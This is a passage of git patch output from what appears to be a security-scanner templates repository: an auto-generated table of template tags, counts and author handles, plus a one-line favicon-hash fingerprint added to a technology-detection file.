sharepoint | 2 | willd96 | 1 | | | | | | | +| nextjs | 2 | alifathi-h1 | 1 | | | | | | | +| vrealize | 2 | bolli95 | 1 | | | | | | | +| telerik | 2 | rojanrijal | 1 | | | | | | | +| nexus | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| openam | 2 | hakluke | 1 | | | | | | | +| coldfusion | 2 | shelld3v | 1 | | | | | | | +| plesk | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| odoo | 2 | gal nagli | 1 | | | | | | | +| jellyfin | 2 | knassar702 | 1 | | | | | | | +| injection | 2 | divya_mudgal | 1 | | | | | | | +| keycloak | 2 | sicksec | 1 | | | | | | | +| smtp | 2 | cookiehanhoan | 1 | | | | | | | +| leak | 2 | vsh00t | 1 | | | | | | | +| sonarqube | 2 | patralos | 1 | | | | | | | +| bitrix | 2 | daviey | 1 | | | | | | | +| mail | 2 | alperenkesk | 1 | | | | | | | +| hpe | 2 | pdp | 1 | | | | | | | +| hp | 2 | 0h1in9e | 1 | | | | | | | +| pega | 2 | fopina | 1 | | | | | | | +| rockmongo | 2 | aceseven (digisec360) | 1 | | | | | | | +| hashicorp | 2 | ohlinge | 1 | | | | | | | +| globalprotect | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| dos | 2 | defr0ggy | 1 | | | | | | | +| flir | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| httpd | 2 | idealphase | 1 | | | | | | | +| cve2008 | 2 | c3l3si4n | 1 | | | | | | | +| showdoc | 2 | dogasantos | 1 | | | | | | | +| sonicwall | 2 | chron0x | 1 | | | | | | | +| glassfish | 2 | yashanand155 | 1 | | | | | | | +| yapi | 2 | kurohost | 1 | | | | | | | +| service | 2 | j33n1k4 | 1 | | | | | | | +| voipmonitor | 2 | ilovebinbash | 1 | | | | | | | +| rockethchat | 2 | its0x08 | 1 | | | | | | | +| ecology | 2 | yavolo | 1 | | | | | | | +| prometheus | 2 | jeya seelan | 1 | | | | | | | +| ucmdb | 2 | ringo | 1 | | | | | | | +| chamilo | 2 | luci | 1 | | | | | | | +| seeyon | 2 | ldionmarcil | 1 | | | | | | | +| natshell | 2 | _generic_human_ | 1 | | | | | | | +| zabbix | 2 | kareemse1im | 1 | | | | | | | +| bigip | 2 | abison_binoy | 1 | | | | | | | +| kibana | 2 | _c0wb0y_ | 1 | | | | | | | +| xxljob | 2 | r3naissance | 1 | | | | | | | +| frp | 2 | koti2 | 1 | | | | | | | +| kentico | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| zhiyuan | 2 | luskabol | 1 | | | | | | | +| icewarp | 2 | kabirsuda | 1 | | | | | | | +| jboss | 2 | shreyapohekar | 1 | | | | | | | +| saltstack | 2 | kba@sogeti_esec | 1 | | | | | | | +| wordfence | 2 | bing0o | 1 | | | | | | | +| huawei | 2 | shifacyclewla | 1 | | | | | | | +| microsoft | 2 | 0xrod | 1 | | | | | | | +| maian | 2 | mubassirpatel | 1 | | | | | | | +| zcms | 1 | thezakman | 1 | | | | | | | +| cgi | 1 | akash.c | 1 | | | | | | | +| 2014 | 1 | alph4byt3 | 1 | | | | | | | +| kafdrop | 1 | kishore krishna (sillydaddy) | 1 | | | | | | | +| apiman | 1 | mhdsamx | 1 | | | | | | | +| bolt | 1 | nytr0gen | 1 | | | | | | | +| openstack | 1 | notsoevilweasel | 1 | | | | | | | +| tapestry | 1 | flag007 | 1 | | | | | | | +| wildfly | 1 | omarkurt | 1 | | | | | | | +| lancom | 1 | sshell | 1 | | | | | | | +| socomec | 1 | elmahdi | 1 | | | | | | | +| webui | 1 | ratnadip gajbhiye | 1 | | | | | | | +| calendarix | 1 | tirtha_mandal | 1 | | | | | | | +| mongoshake | 1 | berkdusunur | 1 | | | | | | | +| discord | 1 | noamrathaus | 1 | | | | | | | +| robomongo | 1 | rtcms | 1 | | | | | | | +| rdp | 1 | whynotke | 1 | | | | | | | +| wooyun | 1 | zandros0 | 1 | | | | | | | +| nette | 1 | affix | 1 | | | | | | | +| csod | 1 | vzamanillo | 1 | | | | | | | +| redis | 1 | rodnt | 1 | | | | | | | +| zm | 1 | becivells | 1 | | | | | | | | spectracom | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| cve2010 | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| status | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | | plc | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| cve2007 | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| igs | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | | mdb | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| dlogin | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | | octobercms | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| igs | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | | opensns | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| axis | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| cve2007 | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| cve2010 | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | | ruby | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| jsf | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| linkerd | 1 | | | | | | | | | | yachtcontrol | 1 | | | | | | | | | +| targa | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | | wp-theme | 1 | | | | | | | | | | rujjie | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| linkerd | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| itop | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| azure | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| targa | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| jsf | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | | rsyncd | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | | k8s | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | | expn | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | From f32303958775590a0fea0157a25eb8955e1d3bfe Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 20 Jul 2021 08:51:14 +0900 Subject: [PATCH 112/149] Update favicon-detection.yaml --- technologies/favicon-detection.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 1a180e71b7..1110dbd233 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -2032,3 +2032,7 @@ requests: name: "OpenSNS" dsl: - "status_code==200 && (\"1167011145\" == mmh3(base64_py(body)))" + - type: dsl + name: "SpamSniper" + dsl: + - "status_code==200 && (\"-1000719429\" == mmh3(base64_py(body)))" From 10e3400dd47ba35ca28c576ee4b600d3cbb72113 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 23:52:03 +0000 Subject: [PATCH 113/149] Auto Generated Templates Stats [Mon Jul 19 23:52:03 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1120 +++++++++++++++++++++--------------------- 2 files changed, 561 insertions(+), 561 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index e29c8178d0..b94a7bfe39 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 